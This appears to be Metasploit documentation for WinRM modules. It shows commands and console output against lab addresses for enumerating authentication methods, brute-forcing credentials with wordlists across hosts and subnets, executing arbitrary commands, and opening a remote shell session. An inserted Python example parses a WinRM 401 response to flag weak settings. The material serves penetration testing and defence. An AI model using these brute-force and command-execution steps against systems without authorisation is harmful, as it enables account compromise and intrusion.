
WinRM Workflows

Windows Remote Management (WinRM) is a way for clients to remotely manage Windows computers. WinRM is built on top of the Simple Object Access Protocol (SOAP) over HTTP(S).

There are two main ports for WinRM:

  • 5985/TCP - HTTP
  • 5986/TCP - HTTPS

Important: Before running the chosen WinRM Metasploit module, first ensure that the RPORT and SSL values are configured correctly, either with the modern inline option support:

use scanner/winrm/winrm_auth_methods

run http://192.168.123.139:5985
run https://192.168.123.139:5986

Or by manually setting options:

use scanner/winrm/winrm_auth_methods
set RHOST 192.168.123.139
set RPORT 5985
set SSL false
run

Metasploit has support for multiple WinRM modules, including:

  • Authentication enumeration
  • Verifying/bruteforcing credentials
  • Running commands and opening sessions

There are more modules than are listed here. For the full list of modules, run the search command within msfconsole:

msf6 > search winrm

Lab Environment

The WinRM modules work against Windows instances which have WinRM installed and configured.

For a domain controller, the "Allow remote server management through WinRM" policy will need to be enabled. It is only possible to use WinRM against accounts which are part of the Remote Management Users group.

WinRM over HTTPS requires the creation of a Server Authenticating Certificate, as well as enabling the transport mode:

winrm quickconfig -transport:https

Authentication Enumeration

Enumerate WinRM authentication mechanisms:

use scanner/winrm/winrm_auth_methods
run http://192.168.123.139:5985
run https://192.168.123.139:5986

Example:

msf6 auxiliary(scanner/winrm/winrm_auth_methods) > run http://192.168.123.139:5985

[+] 192.168.123.139:5985: Negotiate protocol supported
[+] 192.168.123.139:5985: Kerberos protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
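The listener advertises its authentication mechanisms in the WWW-Authenticate headers of the 401 it returns to an unauthenticated request, which is what the output above reflects. The following is an added example, not code from Metasploit or from this page: it parses a constructed 401 response (hypothetical host) and turns the offered schemes into findings a defender would act on, such as Basic being offered on the plain-HTTP 5985 listener.

```python
# Constructed sample response (not captured from the page): what a WinRM
# listener typically answers to an unauthenticated POST to /wsman.
SAMPLE_401 = (
    "HTTP/1.1 401 \r\n"
    "Server: Microsoft-HTTPAPI/2.0\r\n"
    "WWW-Authenticate: Negotiate\r\n"
    "WWW-Authenticate: Kerberos\r\n"
    'WWW-Authenticate: Basic realm="WSMAN"\r\n'
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_auth_methods(raw_response: str) -> list[str]:
    """Return the schemes offered in WWW-Authenticate headers, in order, without duplicates."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    schemes: list[str] = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "www-authenticate":
            # The scheme is the first token; parameters such as realm="..." may follow it.
            scheme = value.strip().split(None, 1)[0]
            if scheme not in schemes:
                schemes.append(scheme)
    return schemes


def assess(schemes: list[str], ssl: bool) -> list[str]:
    """Map the offered schemes to review findings; ssl says whether the listener is the HTTPS one."""
    offered = {s.lower() for s in schemes}
    findings: list[str] = []
    if "basic" in offered:
        finding = "Basic offered"
        if not ssl:
            finding += " on plain HTTP: password crosses the network base64-encoded only"
        findings.append(finding)
    if "credssp" in offered:
        findings.append("CredSSP offered: full credentials are delegated to the server")
    if not offered & {"negotiate", "kerberos"}:
        findings.append("no Negotiate/Kerberos: domain accounts cannot use Kerberos SSO")
    return findings


if __name__ == "__main__":
    methods = parse_auth_methods(SAMPLE_401)
    print("offered:", methods)
    for f in assess(methods, ssl=False):
        print("finding:", f)
```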

WinRM Bruteforce

Brute-force host with known user and password list:

use scanner/winrm/winrm_login
run https://known_user@192.168.222.1:5986 threads=50 pass_file=./wordlist.txt

Brute-force credentials:

use scanner/winrm/winrm_login
run http://192.168.123.139:5985 threads=50 user_file=./users.txt pass_file=./wordlist.txt

Brute-force credentials in a subnet:

use scanner/winrm/winrm_login
run cidr:/24:http://user:pass@192.168.222.0:5985 threads=50
run cidr:/24:http://user@192.168.222.0:5985 threads=50 pass_file=./wordlist.txt

WinRM CMD

To execute arbitrary commands against a Windows target:

use scanner/winrm/winrm_cmd
run http://user:pass@192.168.123.139:5985 cmd='whoami; ipconfig; systeminfo'

WinRM Login Session

If you have valid credentials, the scanner/winrm/winrm_login module will open a Metasploit session for you:

use scanner/winrm/winrm_login
run http://user:pass@192.168.123.139:5985

Example:

msf6 auxiliary(scanner/winrm/winrm_login) > run http://user:pass@192.168.123.139:5985

[!] No active DB -- Credential data will not be saved!
[+] 192.168.123.139:5985 - Login Successful: WORKSTATION\user:pass
[*] Command shell session 7 opened (192.168.123.1:58673 -> 192.168.123.139:5985 ) at 2022-04-23 02:36:34 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
[*] Starting interaction with 7...

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\user>